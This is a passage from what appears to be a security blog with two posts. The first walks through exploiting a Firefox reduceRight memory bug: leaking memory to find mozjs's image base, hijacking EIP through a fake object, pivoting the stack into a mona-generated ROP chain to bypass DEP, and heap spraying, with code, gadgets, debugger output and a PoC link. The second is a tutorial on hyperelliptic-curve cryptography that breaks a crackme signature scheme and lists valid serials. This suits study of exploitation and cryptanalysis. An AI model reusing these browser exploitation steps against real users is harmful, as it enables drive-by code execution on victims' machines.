122     JSVAL_TAG_INT32     = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32,
123     JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED,
124     JSVAL_TAG_STRING    = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING,
125     JSVAL_TAG_BOOLEAN   = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN,
126     JSVAL_TAG_MAGIC     = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC,
127     JSVAL_TAG_NULL      = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL,
128     JSVAL_TAG_OBJECT    = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT
129 } JS_ENUM_FOOTER(JSValueTag);

Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. Observe how the interpreter checks if a jsval_layout is a number:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
405 static JS_ALWAYS_INLINE JSBool
406 JSVAL_IS_NUMBER_IMPL(jsval_layout l)
407 {
408     JSValueTag tag = l.s.tag;
409     JS_ASSERT(tag != JSVAL_TAG_CLEAR);
410     return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET;

So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number.

This isn’t the end of good news, check how doubles are recognized:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
369 static JS_ALWAYS_INLINE JSBool
370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l)
371 {
372     return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR;
373 }

This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and a nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff000000000000 isn’t really a problem — we are just throwing out NaNs.

Knowing that most of values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences.

var leak_func = function bleh(prev, current, index, array) {
    if(typeof current == "number"){
        mem.push(current); //decode with JSPack later
    }
    count += 1;
    if(count >= CHUNK_SIZE/8){
        throw "lol"; //stop dumping
    }
}

Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_layout of type OBJECT, manipulating it later will cause an undesired crash.

Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in the .code section, or pointers to data structures in .data, but how do we find them? After all, they change with every run, because of the varying image base.

By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to the .data section, differing by a constant (0x304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0x304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va – ptr_rva).

It’s a heuristic, but it works 100% of the time.
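The scan can be sketched like this (assuming, for illustration, that the two pointers sit in adjacent dwords; the dump and RVA below are fabricated):

```python
import struct

DELTA = 0x304   # fixed difference between the two .data pointers

def find_imagebase(dump, ptr_rva):
    # walk consecutive dword pairs looking for a difference of 0x304,
    # then image_base = ptr_va - ptr_rva
    n = len(dump) // 4
    dwords = struct.unpack("<%dI" % n, dump[:n * 4])
    for d1, d2 in zip(dwords, dwords[1:]):
        if d2 - d1 == DELTA:
            return d1 - ptr_rva
    return None

# fake dump: junk, then the pair for image_base=0x6a000000 and ptr_rva=0x1234
dump = struct.pack("<4I", 0xDEADBEEF, 0x6A001234, 0x6A001234 + 0x304, 0)
assert find_imagebase(dump, 0x1234) == 0x6A000000
```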

Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1” if the “payload.ptr” field points to an area filled with \x88:

eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888
eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0   ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06
mozjs!js::mjit::stubs::SetElem<0>+0xf9:
655301a9 8b4764   mov eax,dword ptr [edi+64h] ds:002b:888888ec=????????
0:000> k
ChildEBP RetAddr
0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567]
0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619]
0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857]
0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932]

We are using \x88 as a filler, so that every pointer taken from that area is equal to 0x88888888. Since the highest bit is set (the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped :P.

It seems like we can control the value of edi. Let’s see if it’s of any use:

0:000> u eip l10
mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]:
655301a9 8b4764          mov eax,dword ptr [edi+64h]
655301ac 85c0            test eax,eax
655301ae 7505            jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5)
655301b0 b830bb4965      mov eax,offset mozjs!js_SetProperty (6549bb30)
655301b5 8b54241c        mov edx,dword ptr [esp+1Ch]
655301b9 6a00            push 0
655301bb 8d4c2424        lea ecx,[esp+24h]
655301bf 51              push ecx
655301c0 53              push ebx
655301c1 55              push ebp
655301c2 52              push edx
655301c3 ffd0            call eax
655301c5 83c414          add esp,14h
655301c8 85c0            test eax,eax

That’s exactly what we need — value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3.

Where does edi value come from?

0:000> u eip-72 l10
mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]:
65530137 8b7d04          mov     edi,dword ptr [ebp+4]
6553013a 81ffb05f5e65    cmp     edi,offset mozjs!js_ArrayClass (655e5fb0)
65530140 8b5c2414        mov     ebx,dword ptr [esp+14h]
65530144 7563            jne     mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9)

edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union.

It’s now easy to see how to control EIP. Trigger setElem on a controlled jsval_layout union (by executing “current[0]=1” in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy ;).

Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP.

!mona rop -m "mozjs" -rva

“-m” restricts search to just mozjs.dll (that’s the only module with known image base)

“-rva” generates a chain parametrized by module’s image base.

I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX.

There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue:

mov esp, ebp
pop ebp
ret

as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since:

65530137 8b7d04 mov edi,dword ptr [ebp+4]

that would mean [ebp+4] has to be both a return address and a pointer to a function pointer called later @ 655301c3.

We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget:

// 0x68e7a21c, mozjs.dll
// found with mona.py
ADD EBP,EBX
PUSH DS
POP EDI
POP ESI
POP EBX
MOV ESP,EBP // (1)
POP EBP     // (2)
RETN

This will offset EBP by a controlled ODD value. JS strings use two-byte (UTF-16) characters, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with the new EBP value popped @ (2) and executing the same gadget from line (1).

This is how our fake object has to look:

 0          4     8  9         13            17  18         22
+----------+-----+--+---------+-------------+--+----------+------------------------------+
| pivot_va | ptr |00| new_ebp | mov_esp_ebp |00| new_ebp2 | ROP ... normal shellcode ... |
+----------+-----+--+---------+-------------+--+----------+------------------------------+

pivot_va – address of the gadget above

new_ebp – value popped at (2) used to realign the stack to 2

mov_esp_ebp – address of (1)

new_ebp2 – new value of EBP after executing (2) for the second time, not used

ROP – generated ROP chain changing memory perms

normal shellcode – message box shellcode by Skylined
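Assembling the fields above can be sketched with a few lines of Python. This is only a sketch: the concrete values (gadget addresses, ROP chain, shellcode) come from mona’s output and the leaked image base, and are passed in as parameters here:

```python
import struct

def build_fake_object(pivot_va, ptr, new_ebp, mov_esp_ebp, new_ebp2, rop):
    # Offsets match the layout diagram: 0, 4, 8, 9, 13, 17, 18, 22.
    obj  = struct.pack('<II', pivot_va, ptr)         # 0: pivot_va, 4: ptr
    obj += b'\x00'                                   # 8: single 00 byte
    obj += struct.pack('<II', new_ebp, mov_esp_ebp)  # 9: new_ebp, 13: mov_esp_ebp
    obj += b'\x00'                                   # 17: single 00 byte
    obj += struct.pack('<I', new_ebp2)               # 18: new_ebp2 (unused)
    obj += rop                                       # 22: ROP chain + shellcode
    return obj
```

The resulting byte string is what gets replicated across the second half of the spray.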

Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory:

low addresses
        +----------------------+
 +------+ ptr  |  0xffff0007   |   ^
 |      +----------------------+   |
 |      |          .           |   |
 |      +----------------------+   |  half1
 | +----+ ptr  |  0xffff0007   |   |
 | |    +----------------------+   |
 | |    |          .           |   v
 | |    +---- end of half1 ----+   ^
 | |    |          .           |   |  margin of
 | |    |          .           |   |  error
 | |    +----------------------+   v
 | +--->|     fake object      |
 +----->|          .           |
        |          .           |
        +----------------------+
high addresses

Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above.

If you run the PoC exploit on Windows XP, this is (most likely) how the heap is going to look:

Zooming into one of the 1MB chunks:

Notice how our payload is aligned to a 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. The beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes which, in effect, allocates too much memory for objects (including strings), so instead of nicely aligned strings in the array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec).

This is how the fake objects from the second part of spray look like:

Four NOPs at the bottom mark the end of mona’s ROP chain.

- Leak mozjs’ image base, as described above.
- Spray the heap with JS, as described above.
- Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating array’s length used in reduceRight().
- Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from expected value by less than size/2, it shouldn’t affect our exploit.
- Trigger the bug.
- Inside JS callback, trigger SetElem, by executing “current[4]=1”. In case of a JS exception (TypeError: current is undefined), change array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing ;).
- See a nice messagebox, confirming success.

PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes).

Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region.

Get the PoC here.

In this blog post, I will try to introduce HE (hyperelliptic) curves, and how to use them in crypto. Using that knowledge, it will be easy to analyze and break a signature scheme implemented in keygenme #2 by Dcoder. Note that this won’t be a rigorous mathematical dissertation, but a “tutorial” for a mathematically inclined programmer :).

The most general definition of an elliptic curve is

$E: y^2 + a_1 x y + a_3 y = x^3 + a_2 x^2 + a_4 x + a_6$.

$E$ is just a set of points fulfilling an equation that is quadratic in terms of $y$ and cubic in $x$. By introducing a special point $O$ (point at infinity) it’s possible to equip $E$ with “point addition“, turning it into an abelian group.

Hyperelliptic curves are more complicated. A HE curve $C$ of genus $g$ over a field $K$ is defined as:

$C: y^2 + h(x) y = f(x)$

where $h, f \in K[x]$, $\deg h \le g$, $\deg f = 2g + 1$, and $f$ monic. Elliptic curves are hyperelliptic curves with $g = 1$. To define addition on $C$, we need to jump through a few mathematical hoops :).

Consider rational functions over an algebraically closed field. Let $r(x) = \frac{x^3}{(x-1)^2}$. It’s easy to see that $x = 0$ is a zero of $r$. It’s also evident that $\lim_{x \to 1} |r(x)| = \infty$.

If for a given $x_0$, $\lim_{x \to x_0} |r(x)| = \infty$, we will say that $r$ has a **pole** at $x_0$. When $\lim_{x \to \infty} |r(x)| = \infty$, we will say that $r$ has a pole at infinity. This is to provide intuition; just remember that pole at infinity == function is not bounded at infinity. To be able to compute the order of such a pole, compute the order of the pole of $r(1/x)$ at $x = 0$.

$x_0$ is a zero of order $m$ for $r$, if $m$ is the largest integer such that $r(x) = (x - x_0)^m g(x)$, where $g$ is a rational function finite and nonzero at $x_0$. Order of a pole is similar: $x_0$ is a pole of order $m$ if $m$ is the largest integer such that $r(x) = \frac{g(x)}{(x - x_0)^m}$. Notice we are allowed to factor this way because we are working over an algebraically closed field, and because of the fundamental theorem of algebra.

In our example, $r$ has a zero of order 3 at $x = 0$, a pole of order 2 at $x = 1$ and a pole of order 1 at infinity.

Another example. Let $r(x) = x^5$. $x = 0$ is a zero of order 5. We also have a pole at infinity. To compute its order, we need to know the order of the pole of $r(1/x) = x^{-5}$ at $x = 0$, so order = 5.

Consider the set of rational functions over $C$, where the HE curve $C$ is defined over $K$. “Over” means our function acts on points of $C$, so for a point $P = (x, y)$, the arguments $x$ and $y$ satisfy $y^2 + h(x) y = f(x)$ “for free”.

To keep track of zeros and poles of a function, we can use a **divisor**. You can think about them as multisets allowing a negative number of elements. For example, let $r$ have a zero of order 2 at $P_1$, a zero of order 1 at $P_2$, a pole of order 2 at $P_3$ and a pole of order 1 at infinity. The divisor of $r$ is $\mathrm{div}(r) = 2 P_1 + P_2 - 2 P_3 - \infty$. Note that divisors aren’t supposed to be evaluated (plus and minus signs are not for point addition/subtraction), they are just “lists”, or “multisets” of zeros/poles. You can look at $\mathrm{div}(r)$ like it’s a list: $[P_1, P_1, P_2, -P_3, -P_3, -\infty]$.
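The multiset view is easy to model in code. A toy sketch (point labels are arbitrary strings here, with `INF` standing in for the point at infinity):

```python
def div_add(D1, D2):
    # Add divisors by adding like terms; drop points whose coefficient hits 0.
    out = dict(D1)
    for P, n in D2.items():
        out[P] = out.get(P, 0) + n
        if out[P] == 0:
            del out[P]
    return out

def deg(D):
    # Degree of a divisor = sum of its coefficients.
    return sum(D.values())

# The divisor from the example: zero of order 2 at P1, zero of order 1 at P2,
# pole of order 2 at P3, pole of order 1 at infinity.
D = {'P1': 2, 'P2': 1, 'P3': -2, 'INF': -1}
print(deg(D))               # 0
print(deg(div_add(D, D)))   # 0
```

Divisors of rational functions always have degree 0 (that’s theorem 1 below), and adding divisors term-wise preserves that.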

More formally, for a nonzero rational function $r$ on $C$, its divisor is given by

$\mathrm{div}(r) = \sum_{P \in C} \mathrm{ord}_P(r) \, P$

where almost all of the coefficients are zero (there are finitely many nonzero). $\mathrm{ord}_P(r)$ is defined as:

- $m$, if $P$ is a zero of order $m$,
- $-m$, if $P$ is a pole of order $m$,
- 0, if $P$ is neither a zero, nor a pole.

$\mathrm{ord}_P(r)$ is the “order of vanishing of the function $r$ at point $P$“. For details see [1] (page 8). You can assume that computing orders works like for ordinary rational functions, so it’s ok to factor the numerator / denominator, etc. (this isn’t 100% true, but that’s not important).

To continue, we need

**Theorem 1**

*Let $r$ be a rational function on $C$, then $\sum_{P \in C} \mathrm{ord}_P(r) = 0$.*

For proof, see theorem 4.6, page 9 in [1]. This theorem is useful for computing divisors. For $r = p/q$, compute the zeros of $p$ and the zeros of $q$ (poles of $r$) and check if their orders (using the definition of $\mathrm{ord}_P$ above) sum to 0. If not, add / subtract the point at infinity.

We can add / subtract divisors by adding / subtracting like terms. For example (over the complex numbers), let $C: y^2 = x^3 + 1$ (a genus 1 curve), $r_1 = y/x$, $r_2 = x/y$.

To find $\mathrm{div}(r_1)$ we need to know the zeros and poles of $r_1$. Since $y^2 = x^3 + 1$, there are 3 points on $C$ with $y = 0$: $P_1, P_2, P_3$ (with $x$ ranging over the roots of $x^3 + 1$). There are two points with $x = 0$: $Q_1 = (0, 1)$, $Q_2 = (0, -1)$. Points $P_i$ are zeros and $Q_j$ are poles, so $\mathrm{div}(r_1) = P_1 + P_2 + P_3 - Q_1 - Q_2 - \infty$ ($-\infty$ was added to satisfy theorem 1). Similarly $\mathrm{div}(r_2) = Q_1 + Q_2 + \infty - P_1 - P_2 - P_3$.

Now, $\mathrm{div}(r_1) + \mathrm{div}(r_2) = 0$, where $0$ is the empty divisor. You might notice that $r_1 r_2 = 1$. Indeed, it’s true that:

$\mathrm{div}(r s) = \mathrm{div}(r) + \mathrm{div}(s)$ and $\mathrm{div}(r/s) = \mathrm{div}(r) - \mathrm{div}(s)$.

From the above properties, it follows that the set of divisors of rational functions (we will call them principal divisors) forms a subgroup $\mathrm{Prin}(C)$ of the group of all divisors $\mathrm{Div}(C)$. We will denote the subgroup of divisors of degree 0 (with sum of coefficients equal to zero) as $\mathrm{Div}^0(C)$. Theorem 1 implies that $\mathrm{Prin}(C) \subseteq \mathrm{Div}^0(C)$.

Here comes the magic part.

We define the quotient group:

$\mathrm{Pic}^0(C) = \mathrm{Div}^0(C) / \mathrm{Prin}(C)$

$\mathrm{Pic}^0(C)$ is called the degree zero part of the Picard (or divisor class) group of $C$.

For a hyperelliptic curve $C$ of genus $g$, there exists an abelian variety $J(C)$ of dimension $g$ which is isomorphic to $\mathrm{Pic}^0(C)$. $J(C)$ is called the Jacobian of $C$.

You can safely disregard the magic part above. The important thing to know is that with HE curves, we perform operations on the curve’s Jacobian. $J(C)$ has its own group law, which uses reduced divisors in their Mumford representation.

If you want to just implement HE crypto, you can treat Cantor’s algorithm and Mumford representation as blackboxes given by mathematicians, but I think it’s useful to know how divisors work and what Mumford polynomials represent.

It’s time to analyze our target and show some examples.

Dcoder implemented polynomial operations on his own, so we are forced to identify them by hand, by looking at the disassembly. This part is easy, so I’ll skip it :).

What’s not easy is identifying the protection scheme, without knowing how HE crypto works. There are many clues that the keygenme implements elliptic curve crypto. For example, here’s a top level view of a part of the verification procedure:

decode_serial(&part4, &part3, &part2, &part1);
serial_part12 = __PAIR__(part2 << 32 >> 32, part1);
v20 = part3;
f1(&k1_Px, &k1_Py, &f, &h, &Px, &Py, part3 + (part4 << 32));
f1(&k2_Qx, &k2_Qy, &f, &h, &Qx, &Qy, serial_part12);
f2(&k1_Px, &k1_Py, &f, &h, &k1_Px, &k1_Py, &k2_Qx, &k2_Qy);

Looking inside f1, we see:

do
{
  f2(&a3a, &v13, f, h, &a3a, &v13, &a3a, &v13);
  if ( k & (1i64 << v7) )
    f2(&a3a, &v13, f, h, &a3a, &v13, in_x, in_y);
  --v7;
}
while ( v7 >= 0 );

This looks like double and add algorithm for elliptic curves, so our hypothesis is that f1 is point multiplication and f2 point addition. We can verify this by feeding values to these functions and checking their output. For example, computing P+P and 2*P should produce the same result. Quick check shows that’s indeed the case.
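The loop above is the classic left-to-right double-and-add. A generic sketch, parametrized by the group’s `add` operation (the role f2 plays in the keygenme):

```python
def scalar_mult(k, P, add, identity):
    # Scan the bits of k from most to least significant:
    # double at every step, add P when the bit is set.
    R = identity
    for bit in bin(k)[2:]:
        R = add(R, R)
        if bit == '1':
            R = add(R, P)
    return R

# Sanity check in a toy group (integers under addition):
plus = lambda a, b: a + b
print(scalar_mult(13, 5, plus, 0))   # 65
```

The same blackbox check as in the text applies: `scalar_mult(2, P, ...)` must equal `add(P, P)`.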

With high level functions identified, it’s easy to see that we are dealing with the Nyberg-Rueppel signature scheme. In order to emit correct signatures, we need to solve an instance of the discrete logarithm problem.

Even without knowing that we are dealing with HE curves, we can just rip the code for point addition and use it as a blackbox in Pollard’s kangaroo (lambda) algorithm. The kangaroo attack works in any group and uses only addition and multiplication in that group. Running time is $O(\sqrt{w})$, where $w$ is the size of the interval containing the discrete log. Notice that we can’t use Pollard’s rho (which is faster by a constant factor), because rho requires the group’s order as a parameter and we have no means to compute it without knowing what group we are dealing with.
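A minimal kangaroo sketch over a toy group (multiplication mod a prime here; in the keygenme the group operation would be the ripped point-addition code). For simplicity this variant records every tame footprint in a dict; all parameters are illustrative:

```python
def kangaroo(g, h, p, a, b, k=4):
    # Solve g^x = h (mod p) for x in [a, b], if the two walks collide.
    S = [2 ** i for i in range(k)]              # deterministic jump sizes
    # Tame kangaroo: start at g^b, record footprints with travelled distance.
    tame, d, y = {}, 0, pow(g, b, p)
    for _ in range(4 * int((b - a) ** 0.5) + 10):
        tame[y] = d
        s = S[y % k]
        y, d = y * pow(g, s, p) % p, d + s
    tame[y] = d
    # Wild kangaroo: start at h = g^x; hitting a tame footprint at
    # distance t means x + d2 = b + t (mod group order).
    d2, y2 = 0, h % p
    while d2 <= b - a + d:
        if y2 in tame:
            return b + tame[y2] - d2
        s = S[y2 % k]
        y2, d2 = y2 * pow(g, s, p) % p, d2 + s
    return None                                  # walks never collided

x = kangaroo(5, pow(5, 777, 10007), 10007, 0, 1000)
print(x is None or pow(5, x, 10007) == pow(5, 777, 10007))   # True
```

With these toy parameters the search typically succeeds; any returned value is a valid exponent even if it differs from the original by a multiple of the group order.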

Even with Pollard’s kangaroo, we still need to know how large the order is. If it’s too big, then perhaps we need to be smarter about finding this DLOG. We can obtain a rough estimate by observing what kind of points we are getting out of the point addition/multiplication procedures.

Quick inspection in a debugger shows that the first coordinate $u$ is always a monic polynomial of degree at most 4, and the second coordinate $v$ a polynomial of degree at most 3. Since we are working with polynomials over $GF(p)$ with $p = 8191 \approx 2^{13}$, there can be at most $2 p^4 \approx 2^{53}$ (we expect our curve to be symmetric, thus the additional factor of 2) such points in our mysterious group :). It’s a lot, but remember that the kangaroo attack has a running time of $O(\sqrt{w})$, so in our case $\approx 2^{26.5}$, which is low enough for kangaroo to be practical.

Knowing we are dealing with a hyperelliptic curve, we can be more specific about the group’s order: we can actually compute it exactly, and this will allow us to use Pollard’s rho instead of kangaroo.

Here are the params, in SAGE format:

x = GF(8191)['x'].gen()
f = 3076 + 1177*x + 6969*x^2 + 294*x^3 + 6512*x^4 + 7340*x^5 + 5891*x^6 + 3050*x^7 + 0*x^8 + 1*x^9
H = HyperellipticCurve(f)
J = H.jacobian()
X = J(GF(8191))
Px = 1875 + 1721*x + 5809*x^2 + 5647*x^3 + 1*x^4
Py = 6019 + 3070*x + 1666*x^2 + 688*x^3
Qx = 4134 + 2027*x + 4475*x^2 + 4255*x^3 + 1*x^4
Qy = 6525 + 928*x + 1361*x^2 + 6937*x^3
P = X([Px, Py])
Q = X([Qx, Qy])
O = P - P
frob = H.frobenius_polynomial()
order = frob(1)
dlog = 3414275298009790
print order*P == O, dlog*P == Q

Running the above in SAGE will produce *True, True* on output, which means the order of the Jacobian and the dlog are indeed correct.
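If you don’t have SAGE at hand, the defining Mumford property of P (with $h = 0$: $v^2 \equiv f \pmod{u}$ over $GF(8191)$) should also hold for the parameters above, and can be checked with plain Python polynomial arithmetic:

```python
p = 8191
# Coefficient lists, lowest degree first (transcribed from the SAGE snippet).
f = [3076, 1177, 6969, 294, 6512, 7340, 5891, 3050, 0, 1]
u = [1875, 1721, 5809, 5647, 1]      # Px: monic, degree 4
v = [6019, 3070, 1666, 688]          # Py: degree 3

def polmul(a, b):
    # Schoolbook multiplication mod p.
    out = [0] * (len(a) + len(b) - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            out[i + j] = (out[i + j] + ai * bj) % p
    return out

def polmod(a, m):
    # Reduce a modulo the monic polynomial m, stripping leading zeros.
    a = a[:]
    while len(a) >= len(m):
        c, shift = a[-1], len(a) - len(m)
        for i, mi in enumerate(m):
            a[shift + i] = (a[shift + i] - c * mi) % p
        while a and a[-1] == 0:
            a.pop()
    return a

lhs = polmod(polmul(v, v), u)
rhs = polmod(f, u)
print(lhs == rhs)
```

This is exactly the validation SAGE performs when constructing `X([Px, Py])`.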

The HE curve we are working on is $C: y^2 = f(x)$, where $\deg f = 9$ and $h = 0$, so the genus is $g = 4$. Since we are working with polynomials over $GF(p)$, with $p = 8191$, the Jacobian will be defined over $GF(8191)$.

The order of the Jacobian is given explicitly by $|J| = \chi(1)$, where $\chi$ is its characteristic (Frobenius) polynomial (page 6, [2]).

The exact order is 4518471260972087 (~2^52), which is 2 times smaller than our rough estimate of 2^53, so knowing the exact order decreases the running time of kangaroo by a factor of $\sqrt{2}$.

We can also bound the order using the Hasse-Weil theorem. In our case, the theorem states that the order lies in the interval $[(\sqrt{p} - 1)^{2g}, (\sqrt{p} + 1)^{2g}]$. The upper bound is only 1.08 times larger than the exact order, so it’d be a very good estimate.
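A quick check of that claim in Python, using the exact order computed above:

```python
import math

p, g = 8191, 4
order = 4518471260972087            # exact Jacobian order from SAGE
lo = (math.sqrt(p) - 1) ** (2 * g)  # Hasse-Weil lower bound
hi = (math.sqrt(p) + 1) ** (2 * g)  # Hasse-Weil upper bound
print(lo < order < hi)              # True
print(hi / order)                   # the ratio quoted in the text
```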

Kangaroo implemented with FLINT solves the DLP in under an hour, using one 2GHz core. The solution is 3414275298009790.

For hyperelliptic curves, group law is defined for their Jacobians. To “add points” use Mumford representation and Cantor’s algorithm. For solving DLP over HE curves, you can use general purpose algorithms like Pollard’s rho/lambda, Pohlig Hellman, or index calculus. Note that curves of high genus are insecure in the sense that index calculus runs in subexponential time for them (see here for a discussion). For bounding/computing order, use Hasse-Weil theorem, or Frobenius polynomial.

Sources available on github, as usual.

A few serials, to prove correctness :):

pa_kt  38531D6B8FDF2A884166423D58B125B2
trololo  C356A2AB43CA6ACCEF72CCEE0C3FD40A
crackmes.us  076C49CC3AFF9D25CE8B7CA783B72430

P.S.

Dcoder pointed out I should mention the Riemann-Roch theorem. Thanks to R-R it’s possible to construct the isomorphism between $\mathrm{Pic}^0(C)$ and the Jacobian $J(C)$ (it ensures the existence of reduced divisors).

**References**

[1] Leonard S. Charlap, David P. Robbins, *An Elementary Introduction to Elliptic Curves*

[2] Pierrick Gaudry, Robert Harley, *Counting Points on Hyperelliptic Curves over Finite Fields*